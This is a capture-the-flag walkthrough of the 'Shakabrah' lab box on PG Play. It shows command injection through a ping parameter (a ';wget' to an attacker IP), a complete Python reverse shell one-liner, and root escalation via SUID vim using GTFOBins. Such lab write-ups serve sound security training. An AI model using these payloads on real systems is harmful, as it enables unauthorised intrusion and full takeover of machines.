Shakabrah Walkthrough

Shakabrah (PGPlay) Writeup

Shakabrah is a warm-up box in Offensive Security’s PG Play platform.

Recon

So, for recon, we use the Nmap tool. Nmap will scan the IP and detect the information about the target, like open ports, running services and versions, etc.

Nmap found two open ports, SSH (22) and HTTP (80).

HTTP Port 80

We're allowed to run the ping command

Here, we ping the 127.0.0.1 IP for the test. and here we get the results.

From here we can get RCE by exploring the interface. We can explore it manually.

So, here I started a Python http handler

Then made the changes after pinging the host

[Target_IP]/?host=127.0.0.1;wget [ATTACK_BOX IP]

Then you observe that the Python http handler had a GET request.

This being the case we can simply try to get RCE by running a python reverse shell.

Now we can lead that command injection to RCE. Look for the https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python payload list to achieve this.

python3 -c 'import socket, subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.x",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Now customize this to your [ATTACK_BOX IP] and Port. And we got a shell on the machine.

We already started the net cat listener to get the shell.

Now, Enumerate the user flag, and in PG Play it is stored in local.txt

So, we use the Advanced Find command –

find / -type f -name local.txt 2> /dev/null

• -type f — you are telling find to look exclusively for files

• -name user.txt — instructing the find command to search for a file with the name “user.txt”

• 2> /dev/null — so error messages do not show up as part of the search result

So, After entering the command we will get to know that the user flag path

And, finally, you will get your user flag.

Privilege Escalation

Enumeration of SUID binaries shows us that vim.basic is SUID as root.

find / -type f -perm -04000 -ls 2>/dev/null

Here, we go to the /usr/bin/vim.basic, then type : after --More--

Then Enter and you get interface like below.

From https://gtfobins.github.io/gtfobins/vim/ we get several possible ways of getting a root shell.

Now type the command that I highlighted in the SUID.

But use py3 if py not works.. Then Enter

Now you will get question which ask the terminal type?

Type – xterm

Finally we will get the root shell.

Then cd /root and then ls

It shows proof.txt and it has a root flag in it

cat proof.txt